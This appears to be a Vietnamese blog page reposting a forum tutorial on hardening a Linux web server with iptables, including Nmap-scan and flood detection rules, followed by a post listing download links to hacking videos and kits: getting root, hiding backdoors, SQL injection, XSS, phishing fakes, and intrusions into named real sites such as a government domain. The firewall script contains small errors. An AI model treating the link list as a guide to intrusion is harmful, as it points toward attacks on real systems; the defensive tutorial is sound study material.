Cách 2: đặt các máy chủ phục vụ web trong một mạng DMZ. Cách này tiết kiệm được nhiều địa chỉ IP nhưng bù lại bạn gateway Iptables 1.2.3.4 - 192.168.0.254 có thể load nặng hơn trước và yêu cầu bạn đầu tư tiền cho đường truyền mạng từ gateway ra Internet.
Bạn dùng DNAT trên gateway 1.2.3.4 để chuyển tiếp các gói dữ liệu từ client đến một trong các máy chủ phục vụ web trong mạng DMZ hoặc mạng LAN như sau:
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 192.168.0.1-192.168.0.4
--------------------------------------------------------------------------------
Mình đã trình bày xong các bạn về cách cấu hình tường lửa Iptables trên Linux. Hi vọng là bạn có thể nắm được các vấn đề mà mình đã trình bày và có thể tự mình đặt luật cho Iptables để bảo vệ cho máy chủ của bạn. Chúc bạn thành công.
(sưu tập và chỉnh sửa )
۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của ghost_vn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩
url:http://haiphongit.com/forum/showthread.php?t=2831
Lời mở đầu
Trong bài viết này, mình sẽ hướng dẫn cho bạn cách thiết lập tường lửa Iptables trên Linux. Bài viết gồm hai phần chính: phần I sẽ giới thiệu cơ bản về cách thức hoạt động của Iptables và phần II sẽ hướng dẫn bạn lập cấu hình Iptables cho một máy chủ phục vụ Web cụ thể
Bạn download file kèm theo tại địa chỉ IPtables
Phần I: Giới thiệu về Iptables
Iptables là một tường lửa ứng dụng lọc gói dữ liệu rất mạnh, miễn phí và có sẵn trên Linux.. Netfilter/Iptables gồm 2 phần là Netfilter ở trong nhân Linux và Iptables nằm ngoài nhân. Iptables chịu trách nhiệm giao tiếp giữa người dùng và Netfilter để đẩy các luật của người dùng vào cho Netfiler xử lí. Netfilter tiến hành lọc các gói dữ liệu ở mức IP. Netfilter làm việc trực tiếp trong nhân, nhanh và không làm giảm tốc độ của hệ thống.
Hình Kèm Theo
Cách đổi địa chỉ IP động (dynamic NAT)
Trước khi đi vào phần chính, mình cần giới thiệu với các bạn về công nghệ đổi địa chỉ NAT động và đóng giả IP Masquerade. Hai từ này được dùng rất nhiều trong Iptables nên bạn phải biết. Nếu bạn đã biết NAT động và Masquerade, bạn có thể bỏ qua phần này.
NAT động là một trong những kĩ thuật chuyển đổi địa chỉ IP NAT (Network Address Translation). Các địa chỉ IP nội bộ được chuyển sang IP NAT như sau:
NAT Router đảm nhận việc chuyển dãy IP nội bộ 169.168.0.x sang dãy IP mới 203.162.2.x. Khi có gói liệu với IP nguồn là 192.168.0.200 đến router, router sẽ đổi IP nguồn thành 203.162.2.200 sau đó mới gởi ra ngoài. Quá trình này gọi là SNAT (Source-NAT, NAT nguồn). Router lưu dữ liệu trong một bảng gọi là bảng NAT động. Ngược lại, khi có một gói từ liệu từ gởi từ ngoài vào với IP đích là 203.162.2.200, router sẽ căn cứ vào bảng NAT động hiện tại để đổi địa chỉ đích 203.162.2.200 thành địa chỉ đích mới là 192.168.0.200. Quá trình này gọi là DNAT (Destination-NAT, NAT đích). Liên lạc giữa 192.168.0.200 và 203.162.2.200 là hoàn toàn trong suốt (transparent) qua NAT router. NAT router tiến hành chuyển tiếp (forward) gói dữ liệu từ 192.168.0.200 đến 203.162.2.200 và ngược lại.
Hình Kèm Theo
Cách đóng giả địa chỉ IP (masquerade)
Đây là một kĩ thuật khác trong NAT.
NAT Router chuyển dãy IP nội bộ 192.168.0.x sang một IP duy nhất là 203.162.2.4 bằng cách dùng các số hiệu cổng (port-number) khác nhau. Chẳng hạn khi có gói dữ liệu IP với nguồn 192.168.0.168:1204, đích 211.200.51.15:80 đến router, router sẽ đổi nguồn thành 203.162.2.4:26314 và lưu dữ liệu này vào một bảng gọi là bảng masquerade động. Khi có một gói dữ liệu từ ngoài vào với nguồn là 221.200.51.15:80, đích 203.162.2.4:26314 đến router, router sẽ căn cứ vào bảng masquerade động hiện tại để đổi đích từ 203.162.2.4:26314 thành 192.168.0.164:1204. Liên lạc giữa các máy trong mạng LAN với máy khác bên ngoài hoàn toàn trong suốt qua router.
Hình Kèm Theo
Cấu trúc của Iptables
Iptables được chia làm 4 bảng (table): bảng filter dùng để lọc gói dữ liệu, bảng nat dùng để thao tác với các gói dữ liệu được NAT nguồn hay NAT đích, bảng mangle dùng để thay đổi các thông số trong gói IP và bảng conntrack dùng để theo dõi các kết nối. Mỗi table gồm nhiều mắc xích (chain). Chain gồm nhiều luật (rule) để thao tác với các gói dữ liệu. Rule có thể là ACCEPT (chấp nhận gói dữ liệu), DROP (thả gói), REJECT (loại bỏ gói) hoặc tham chiếu (reference) đến một chain khác.
--------------------------------------------------------------------------------
Quá trình chuyển gói dữ liệu qua Netfilter
Gói dữ liệu (packet) chạy trên chạy trên cáp, sau đó đi vào card mạng (chẳng hạn như eth0). Đầu tiên packet sẽ qua chain PREROUTING (trước khi định tuyến). Tại đây, packet có thể bị thay đổi thông số (mangle) hoặc bị đổi địa chỉ IP đích (DNAT). Đối với packet đi vào máy, nó sẽ qua chain INPUT. Tại chain INPUT, packet có thể được chấp nhận hoặc bị hủy bỏ. Tiếp theo packet sẽ được chuyển lên cho các ứng dụng (client/server) xử lí và tiếp theo là được chuyển ra chain OUTPUT. Tại chain OUTPUT, packet có thể bị thay đổi các thông số và bị lọc chấp nhận ra hay bị hủy bỏ. Đối với packet forward qua máy, packet sau khi rời chain PREROUTING sẽ qua chain FORWARD. Tại chain FORWARD, nó cũng bị lọc ACCEPT hoặc DENY. Packet sau khi qua chain FORWARD hoặc chain OUTPUT sẽ đến chain POSTROUTING (sau khi định tuyến). Tại chain POSTROUTING, packet có thể được đổi địa chỉ IP nguồn (SNAT) hoặc MASQUERADE. Packet sau khi ra card mạng sẽ được chuyển lên cáp để đi đến máy tính khác trên mạng.
Hình Kèm Theo
Các tham số dòng lệnh thường gặp của Iptables
1. Gọi trợ giúp
Để gọi trợ giúp về Iptables, bạn gõ lệnh $ man iptables hoặc $ iptables --help. Chẳng hạn nếu bạn cần biết về các tùy chọn của match limit, bạn gõ lệnh $ iptables -m limit --help.
2. Các tùy chọn để chỉ định thông số
- chỉ định tên table: -t
- chỉ đinh loại giao thức: -p
- chỉ định card mạng vào: -i
- chỉ định card mạng ra: -o
- chỉ định địa chỉ IP nguồn: -s <địa_chỉ_ip_nguồn>, ví dụ: -s 192.168.0.0/24 (mạng 192.168.0 với 24 bít mạng), -s 192.168.0.1-192.168.0.3 (các IP 192.168.0.1, 192.168.0.2, 192.168.0.3).
- chỉ định địa chỉ IP đích: -d <địa_chỉ_ip_đích>, tương tự như -s
- chỉ định cổng nguồn: --sport
- chỉ định cổng đích: --dport
3. Các tùy chọn để thao tác với chain
- tạo chain mới: iptables -N
- xóa hết các luật đã tạo trong chain: iptables -X
- đặt chính sách cho các chain `built-in` (INPUT, OUTPUT & FORWARD): iptables -P
- liệt kê các luật có trong chain: iptables -L
- xóa các luật có trong chain (flush chain): iptables -F
- reset bộ đếm packet về 0: iptables -Z
4. Các tùy chọn để thao tác với luật
- thêm luật: -A (append)
- xóa luật: -D (delete)
- thay thế luật: -R (replace)
- chèn thêm luật: -I (insert)
Mình sẽ cho ví dụ minh họa về các tùy chọn này ở phần sau.
--------------------------------------------------------------------------------
Phân biệt giữa ACCEPT, DROP và REJECT packet
- ACCEPT: chấp nhận packet
- DROP: thả packet (không hồi âm cho client)
- REJECT: loại bỏ packet (hồi âm cho client bằng một packet khác)
Ví dụ:
# iptables -A INPUT -i eth0 --dport 80 -j ACCEPT chấp nhận các packet vào cổng 80 trên card mạng eth0
# iptables -A INPUT -i eth0 -p tcp --dport 23 -j DROP thả các packet đến cổng 23 dùng giao thức TCP trên card mạng eth0
# iptables -A INPUT -i eth1 -s ! 10.0.0.1-10.0.0.5 --dport 22 -j REJECT --reject-with tcp-reset gởi gói TCP với cờ RST=1 cho các kết nối không đến từ dãy địa chỉ IP 10.0.0.1..5 trên cổng 22, card mạng eth1
# iptables -A INPUT -p udp --dport 139 -j REJECT --reject-with icmp-port-unreachable gởi gói ICMP `port-unreachable` cho các kết nối đến cổng 139, dùng giao thức UDP
--------------------------------------------------------------------------------
Phân biệt giữa NEW, ESTABLISHED và RELATED
- NEW: mở kết nối mới
- ESTABLISHED: đã thiết lập kết nối
- RELATED: mở một kết nối mới trong kết nối hiện tại
Ví dụ:
# iptables -P INPUT DROP đặt chính sách cho chain INPUT là DROP
# iptables -A INPUT -p tcp --syn -m state --state NEW -j ACCEPT chỉ chấp nhận các gói TCP mở kết nối đã set cờ SYN=1
# iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT không đóng các kết nối đang được thiết lập, đồng thời cũng cho phép mở các kết nối mới trong kết nối được thiết lập
# iptables -A INPUT -p tcp -j DROP các gói TCP còn lại đều bị DROP
--------------------------------------------------------------------------------
Tùy chọn --limit, --limit-burst
--limit-burst: mức đỉnh, tính bằng số packet
--limit: tốc độ khi chạm mức đỉnh, tính bằng số packet/s(giây), m(phút), d(giờ) hoặc h(ngày)
Mình lấy ví dụ cụ thể để bạn dễ hiểu:
# iptables -N test
# iptables -A test -m limit --limit-burst 5 --limit 2/m -j RETURN
# iptables -A test -j DROP
# iptables -A INPUT -i lo -p icmp --icmp-type echo-request -j test
Đầu tiên lệnh iptables -N test để tạo một chain mới tên là test (table mặc định là filter). Tùy chọn -A test (append) để thêm luật mới vào chain test. Đối với chain test, mình giới hạn limit-burst ở mức 5 gói, limit là 2 gói/phút, nếu thỏa luật sẽ trở về (RETURN) còn không sẽ bị DROP. Sau đó mình nối thêm chain test vào chain INPUT với tùy chọn card mạng vào là lo, giao thức icmp, loại icmp là echo-request. Luật này sẽ giới hạn các gói PING tới lo là 2 gói/phút sau khi đã đạt tới 5 gói.
Bạn thử ping đến localhost xem sao?
$ ping -c 10 localhost
Chỉ 5 gói đầu trong phút đầu tiên được chấp nhận, thỏa luật RETURN đó. Bây giờ đã đạt đến mức đỉnh là 5 gói, lập tức Iptables sẽ giới hạn PING tới lo là 2 gói trên mỗi phút bất chấp có bao nhiêu gói được PING tới lo đi nữa. Nếu trong phút tới không có gói nào PING tới, Iptables sẽ giảm limit đi 2 gói tức là tốc độ đang là 2 gói/phút sẽ tăng lên 4 gói/phút. Nếu trong phút nữa không có gói đến, limit sẽ giảm đi 2 nữa là trở về lại trạng thái cũ chưa đạt đến mức đỉnh 5 gói. Quá trình cứ tiếp tục như vậy. Bạn chỉ cần nhớ đơn giản là khi đã đạt tới mức đỉnh, tốc độ sẽ bị giới hạn bởi tham số--limit. Nếu trong một đơn vị thời gian tới không có gói đến, tốc độ sẽ tăng lên đúng bằng --limit đến khi trở lại trạng thái chưa đạt mức --limit-burst thì thôi.
Để xem các luật trong Iptables bạn gõ lệnh $ iptables -L -nv (-L tất cả các luật trong tất cả các chain, table mặc định là filter, -n liệt kê ở dạng số, v để xem chi tiết)
# iptables -L -nv
Chain INPUT (policy ACCEPT 10 packets, 840 bytes)
pkts bytes target prot opt in out source destination
10 840 test icmp -- lo * 0.0.0.0/0 0.0.0.0/0 icmp type 8
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 15 packets, 1260 bytes)
pkts bytes target prot opt in out source destination
Chain test (1 references)
pkts bytes target prot opt in out source destination
5 420 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0 limit: avg 2/min burst 5
5 420 DROP all -- * * 0.0.0.0/0 0.0.0.0/0
# iptables -Z reset counter
# iptables -F flush luật
# iptables -X xóa chain đã tạo
--------------------------------------------------------------------------------
Redirect cổng
Iptables hổ trợ tùy chọn -j REDIRECT cho phép bạn đổi hướng cổng một cách dễ dàng. Ví dụ như SQUID đang listen trên cổng 3128/tcp. Để redirect cổng 80 đến cổng 3128 này bạn làm như sau:
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
SNAT & MASQUERADE
Để tạo kết nối `transparent` giữa mạng LAN 192.168.0.1 với Internet bạn lập cấu hình cho tường lửa Iptables như sau:
# echo 1 > /proc/sys/net/ipv4/ip_forward cho phép forward các packet qua máy chủ đặt Iptables
# iptables -t nat -A POSTROUTING -o eth0 -j SNAT --to-source 210.40.2.71 đổi IP nguồn cho các packet ra card mạng eth0 là 210.40.2.71. Khi nhận được packet vào từ Internet, Iptables sẽ tự động đổi IP đích 210.40.2.71 thành IP đích tương ứng của máy tính trong mạng LAN 192.168.0/24.
Hoặc bạn có thể dùng MASQUERADE thay cho SNAT như sau:
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
(MASQUERADE thường được dùng khi kết nối đến Internet là pp0 và dùng địa chỉ IP động)
Hình Kèm Theo
Giả sử bạn đặt các máy chủ Proxy, Mail và DNS trong mạng DMZ. Để tạo kết nối trong suốt từ Internet vào các máy chủ này bạn là như sau:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 192.168.1.2
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 25 -j DNAT --to-destination 192.168.1.3
# iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j DNAT --to-destination 192.168.1.4
--------------------------------------------------------------------------------
Hình Kèm Theo
(sưu tập và chỉnh sửa )
Phần II: Lập cấu hình Iptables cho máy chủ phục vụ Web
--------------------------------------------------------------------------------
Phần này mình sẽ trình bày qua ví dụ cụ thể và chỉ hướng dẫn các bạn lọc packet vào. Các packet `forward` và 'output' bạn tự làm nha.
Giả sử như máy chủ phục vụ Web kết nối mạng trực tiếp vào Internet qua card mạng eth0, địa chỉ IP là 1.2.3.4. Bạn cần lập cấu hình tường lửa cho Iptables đáp ứng các yêu cầu sau:
- cổng TCP 80 (chạy apache) mở cho mọi người truy cập web
- cổng 21 (chạy proftpd) chỉ mở cho webmaster (dùng để upload file lên public_html)
- cổng 22 (chạy openssh) chỉ mở cho admin (cung cấp shell `root` cho admin để nâng cấp & patch lỗi cho server khi cần)
- cổng UDP 53 (chạy tinydns) để phục vụ tên miền (đây chỉ là ví dụ)
- chỉ chấp nhận ICMP PING tới với code=0x08, các loại packet còn lại đều bị từ chối.
--------------------------------------------------------------------------------
Bước 1: thiết lập các tham số cho nhân
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 10 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 1800 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_sack
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo 0 > /proc/sys/net/ipv4/conf/eth0/accept_source_route
tcp_syncookies=1 bật chức năng chống DoS SYN qua syncookie của Linux
tcp_fin_timeout=10 đặt thời gian timeout cho quá trình đóng kết nối TCP là 10 giây
tcp_keepalive_time=1800 đặt thời gian giữ kết nối TCP là 1800 giây
...
Các tham số khác bạn có thể xem chi tiết trong tài liệu đi kèm của nhân Linux.
--------------------------------------------------------------------------------
Bước 2: nạp các môđun cần thiết cho Iptables
Để sử dụng Iptables, bạn cần phải nạp trước các môđun cần thiết. Ví dụ nếu bạn muốn dùng chức năng LOG trong Iptables, bạn phải nạp môđun ipt_LOG vào trước bằng lệnh # modprobe ipt_LOG.
MODULES="ip_tables iptable_filter ipt_LOG ipt_limit ipt_REJECT ipt_state
for i in $MODULES; do
/sbin/modprobe $MODULES
done
--------------------------------------------------------------------------------
Bước 3: nguyên tắc đặt luật là "drop trước, accept sau"
Đây là nguyên tắc mà bạn nên tuân theo. Đầu tiên hãy đóng hết các cổng, sau đó mở dần cách cổng cần thiết. Cách này tránh cho bạn gặp sai sót trong khi đặt luật cho Iptables.
iptables -P INPUT DROP thả packet trước
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT giữ các kết nối hiện tại và chấp nhận các kết nối có liên quan
iptables -A INPUT -i lo -s 127.0.0.1 -j ACCEPT chấp nhận các gói vào looback từ IP 127.0.0.1
iptables -A INPUT -i lo -s 1.2.3.4 -j ACCEPT và 1.2.3.4
BANNED_IP="10.0.0.0/8 192.168.0.0/16 172.16.0.0/12 224.0.0.0/4 240.0.0.0/5"
for i in $BANNED_IP; do
iptables -A INPUT -i eth0 -s $i -j DROP thả các gói dữ liệu đến từ các IP nằm trong danh sách cấm BANNER_IP
done
--------------------------------------------------------------------------------
Bước 4: lọc ICMP vào và chặn ngập lụt PING
LOG của Iptables sẽ được ghi vào file /var/log/firewall.log. Bạn phải sửa lại cấu hình cho SYSLOG như sau:
# vi /etc/syslog.conf
kern.=debug /var/log/firewall.log
# /etc/rc.d/init.d/syslogd restart
Đối với các gói ICMP đến, chúng ta sẽ đẩy qua chain CHECK_PINGFLOOD để kiểm tra xem hiện tại đamg bị ngập lụt PING hay không, sau đó mới cho phép gói vào. Nếu đang bị ngập lụt PING, môđun LOG sẽ tiến hành ghi nhật kí ở mức giới hạn --limit $LOG_LIMIT và --limit-burst $LOG_LIMIT_BURST, các gói PING ngập lụt sẽ bị thả hết.
LOG_LEVEL="debug"
LOG_LIMIT=3/m
LOG_LIMIT_BURST=1
PING_LIMIT=500/s
PING_LIMIT_BURST=100
iptables -A CHECK_PINGFLOOD -m limit --limit $PING_LIMIT --limit-burst $PING_LIMIT_BURST -j RETURN
iptables -A CHECK_PINGFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PINGFLOOD:warning a=DROP "
iptables -A CHECK_PINGFLOOD -j DROP
iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j CHECK_PINGFLOOD
iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j ACCEPT
--------------------------------------------------------------------------------
Bước 5: reject quét cổng TCP và UDP
Ở đây bạn tạo sẵn chain reject quét cổng, chúng ta sẽ đẩy vào chain INPUT sau. Đối với gói TCP, chúng ta reject bằng gói TCP với cờ SYN=1 còn đối với gói UDP, chúng ta sẽ reject bằng gói ICMP `port-unreachable`
iptables-N REJECT_PORTSCAN
iptables-A REJECT_PORTSCAN -p tcp -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PORTSCAN:tcp a=REJECT "
iptables-A REJECT_PORTSCAN -p udp -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PORTSCAN:udp a=REJECT "
iptables-A REJECT_PORTSCAN -p tcp -j REJECT --reject-with tcp-reset
iptables-A REJECT_PORTSCAN -p udp -j REJECT --reject-with icmp-port-unreachable
--------------------------------------------------------------------------------
Bước 6: phát hiện quét cổng bằng Nmap
iptables-N DETECT_NMAP
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL FIN,URG,PSH -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS-PSH a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL ALL -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS-ALL a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL FIN -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:FIN a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags SYN,RST SYN,RST -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:SYN-RST a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:SYN-FIN a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL NONE -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:NULL a=DROP "
iptables-A DETECT_NMAP -j DROP
iptables-A INPUT -i eth0 -p tcp ! --syn -m state --state NEW -j DETECT_NMAP
Đối với các gói TCP đến eth0 mở kết nối nhưng không đặt SYN=1 chúng ta sẽ chuyển sang chain DETECT_NMAP. Đây là những gói không hợp lệ và hầu như là quét cổng bằng nmap hoặc kênh ngầm. Chain DETECT_NMAP sẽ phát hiện ra hầu hết các kiểu quét của Nmap và tiến hành ghi nhật kí ở mức --limit $LOG_LIMIT và --limit-burst $LOG_LIMIT_BURST. Ví dụ để kiểm tra quét XMAS, bạn dùng tùy chọn --tcp-flags ALL FIN,URG,PSH nghĩa là 3 cờ FIN, URG và PSH được bật, các cờ khác đều bị tắt. Các gói qua chain DETECT_NMAP sau đó sẽ bị DROP hết.
--------------------------------------------------------------------------------
Bước 7: chặn ngập lụt SYN
Gói mở TCP với cờ SYN được set 1 là hợp lệ nhưng không ngoại trừ khả năng là các gói SYN dùng để ngập lụt. Vì vậy, ở dây bạn đẩy các gói SYN còn lại qua chain CHECK_SYNFLOOD để kiểm tra ngập lụt SYN như sau:
iptables-N CHECK_SYNFLOOD
iptables-A CHECK_SYNFLOOD -m limit --limit $SYN_LIMIT --limit-burst $SYN_LIMIT_BURST -j RETURN
iptables-A CHECK_SYNFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SYNFLOOD:warning a=DROP "
iptables-A CHECK_SYNFLOOD -j DROP
iptables-A INPUT -i eth0 -p tcp --syn -j CHECK_SYNFLOOD
--------------------------------------------------------------------------------
Bước 8: giới hạn truy cập SSH cho admin
SSH_IP="1.1.1.1"
iptables -N SSH_ACCEPT
iptables -A SSH_ACCEPT -m state --state NEW -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SSH:admin a=ACCEPT "
iptables -A SSH_ACCEPT -j ACCEPT
iptables -N SSH_DENIED
iptables -A SSH_DENIED -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SSH:attempt a=REJECT "
iptables -A SSH_DENIED -p tcp -j REJECT --reject-with tcp-reset
for i in $SSH_IP; do
iptables -A INPUT -i eth0 -p tcp -s $i --dport 22 -j SSH_ACCEPT
done
iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW -j SSH_DENIED
--------------------------------------------------------------------------------
Bước 9: giới hạn FTP cho web-master
FTP_IP="2.2.2.2"
iptables -N FTP_ACCEPT
iptables -A FTP_ACCEPT -m state --state NEW -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FTP:webmaster a=ACCEPT "
iptables -A FTP_ACCEPT -j ACCEPT
iptables -N FTP_DENIED
iptables -A FTP_DENIED -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FTP:attempt a=REJECT "
iptables -A FTP_DENIED -p tcp -j REJECT --reject-with tcp-reset
for i in $FTP_IP; do
iptables -A INPUT -i eth0 -p tcp -s $i --dport 21 -j FTP_ACCEPT
done
iptables -A INPUT -i eth0 -p tcp --dport 21 -m state --state NEW -j FTP_DENIED
--------------------------------------------------------------------------------
Bước 10: lọc TCP vào
iptables -N TCP_INCOMING
iptables -A TCP_INCOMING -p tcp --dport 80 -j ACCEPT
iptables -A TCP_INCOMING -p tcp -j REJECT_PORTSCAN
iptables -A INPUT -i eth0 -p tcp -j TCP_INCOMING
Bước 11: lọc UDP vào và chặn ngập lụt UDP
iptables -N CHECK_UDPFLOOD
iptables -A CHECK_UDPFLOOD -m limit --limit $UDP_LIMIT --limit-burst $UDP_LIMIT_BURST -j RETURN
iptables -A CHECK_UDPFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDPFLOOD:warning a=DROP "
iptables -A CHECK_UDPFLOOD -j DROP
iptables -A INPUT -i eth0 -p udp -j CHECK_UDPFLOOD
iptables -N UDP_INCOMING
iptables -A UDP_INCOMING -p udp --dport 53 -j ACCEPT
iptables -A UDP_INCOMING -p udp -j REJECT_PORTSCAN
iptables -A INPUT -i eth0 -p udp -j UDP_INCOMING
Để hạn chế khả năng bị DoS và tăng cường tốc độ cho máy chủ phục vụ web, bạn có thể dùng cách tải cân bằng (load-balacing) như sau:
Cách 1: chạy nhiều máy chủ phục vụ web trên các địa chỉ IP Internet khác nhau. Ví dụ, ngoài máy chủ phục vụ web hiện tại 1.2.3.4, bạn có thể đầu tư thêm các máy chủ phục vụ web mới 1.2.3.2, 1.2.3.3, 1.2.3.4, 1.2.3.5. Điểm yếu của cách này là tốn nhiều địa chỉ IP Internet.
Cách 2: đặt các máy chủ phục vụ web trong một mạng DMZ. Cách này tiết kiệm được nhiều địa chỉ IP nhưng bù lại bạn gateway Iptables 1.2.3.4 - 192.168.0.254 có thể load nặng hơn trước và yêu cầu bạn đầu tư tiền cho đường truyền mạng từ gateway ra Internet.
Bạn dùng DNAT trên gateway 1.2.3.4 để chuyển tiếp các gói dữ liệu từ client đến một trong các máy chủ phục vụ web trong mạng DMZ hoặc mạng LAN như sau:
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 192.168.0.1-192.168.0.4
--------------------------------------------------------------------------------
Mình đã trình bày xong các bạn về cách cấu hình tường lửa Iptables trên Linux. Hi vọng là bạn có thể nắm được các vấn đề mà mình đã trình bày và có thể tự mình đặt luật cho Iptables để bảo vệ cho máy chủ của bạn. Chúc bạn thành công.
(sưu tập và chỉnh sửa )
۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của ghost_vn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩
url:http://haiphongit.com/forum/showthread.php?t=2831
Thursday, September 11, 2008
bộ sưu tập tổng hợp link down các video dạy hack
bộ sưu tập tổng hợp link down các video dạy hack
có thể 1 số link đã die mong ae thông cảm dùm,link nào die ae kiếm cái khác fix dùm nha
1> http://warezshare.com/download.php?f...df7d54a71f7663
2> http://thanhnamhp.com.vn/cfm.rar
3> http://www.filenanny.com/files/46ecc.../Hacklocal.rar
bug local backup data
4> http://www.mediamax.com/vipundergrou...kup%20data.zip
5>hack shop cfm
http://www.mediamax.com/vipundergroup/Hosted/cfm.rar
6>down load hack
http://www.mediamax.com/vipundergrou...d/download.rar
7>bug esyndicat
http://www.mediamax.com/vipundergrou..._esyndicat.rar
8>bug ezupload
http://www.mediamax.com/vipundergrou...upload-leo.rar
9>file manager bug
http://www.mediamax.com/vipundergrou...le_Manager.rar
10>get root 1
http://www.mediamax.com/vipundergrou...d/getroot1.rar
11>get root2
http://www.mediamax.com/vipundergrou...d/getroot2.rar
12>get root3
http://www.mediamax.com/vipundergrou...d/getroot3.rar
13>Hacking vbb 3.6.6 bug XSS
http://www.mediamax.com/vipundergrou...g%20XXS%29.rar
14>hide backdoor1
http://www.mediamax.com/vipundergrou...0backdoor1.rar
15>hide backdoor2
http://www.mediamax.com/vipundergrou...0backdoor2.rar
16>how i get free host (hack host demo)
http://www.mediamax.com/vipundergrou...etfreehost.rar
17>Invision_Power_Board_2[1].1.7_Password_Change_Demonstration
http://www.mediamax.com/vipundergrou..._Power_Board_2
18>local hack1
http://www.mediamax.com/vipundergrou...al%20hack1.rar
19>local hack2
http://www.mediamax.com/vipundergrou...al%20hack2.rar
20>local hack3
http://www.mediamax.com/vipundergrou...al%20hack3.rar
21>Phim huong dan hack co ban nhat
http://www.mediamax.com/vipundergrou...dan%20hack.rar
22>phpbb
http://www.mediamax.com/vipundergroup/Hosted/phpbb.rar
23>Remote destop hack
http://www.mediamax.com/vipundergrou...Remote-vnc.rar
24>rEmOtEr_VS_Microsoft
http://www.mediamax.com/vipundergrou..._Microsoft.rar
25>SQL injection1
http://www.mediamax.com/vipundergrou...Linjection.rar
26>SQL injection2
http://www.mediamax.com/vipundergrou...injection2.rar
27>how to hack thanhhoa.gov.vn
http://www.mediamax.com/vipundergrou...d/thanhhoa.rar
28>upload hack1
http://www.mediamax.com/vipundergrou...ed/upload1.rar
29>upload hack2
http://www.mediamax.com/vipundergrou...ed/upload2.rar
30>upload hack3
http://www.mediamax.com/vipundergrou...ed/upload3.rar
31>vbb 3.5.x bug ugrade
http://www.mediamax.com/vipundergrou...g%20ugrade.rar
32>video fake ip
http://www.mediamax.com/vipundergrou...0fake%20ip.rar
windows exploit
33>http://www.mediamax.com/vipundergrou...ws-exploit.rar
34>xsst unnelling-video
http://www.mediamax.com/vipundergrou...ling-video.zip
35>Yahoo Fake [FuLL ViDEO bY HeliOs]
http://www.mediamax.com/vipundergrou...ahoo%20Fake%20[FuLL%20ViDEO%20bY%20HeliOs].rar
36>hackshop
http://www.mediamax.com/vipundergrou...d/hackshop.rar
37>video tut backconnect "Moi nguoi fale Ip thif down duoc bang link nay"
http://freewebtown.com/hackingvn/vid...backconect.rar
38>SQL Injection 4
http://www.box.net/shared/static/rsuoufbpj1.rar
or http://rapidshare.com/files/59957095/leo2.rar
39>Demo how i got root on server HPTVIETNAM
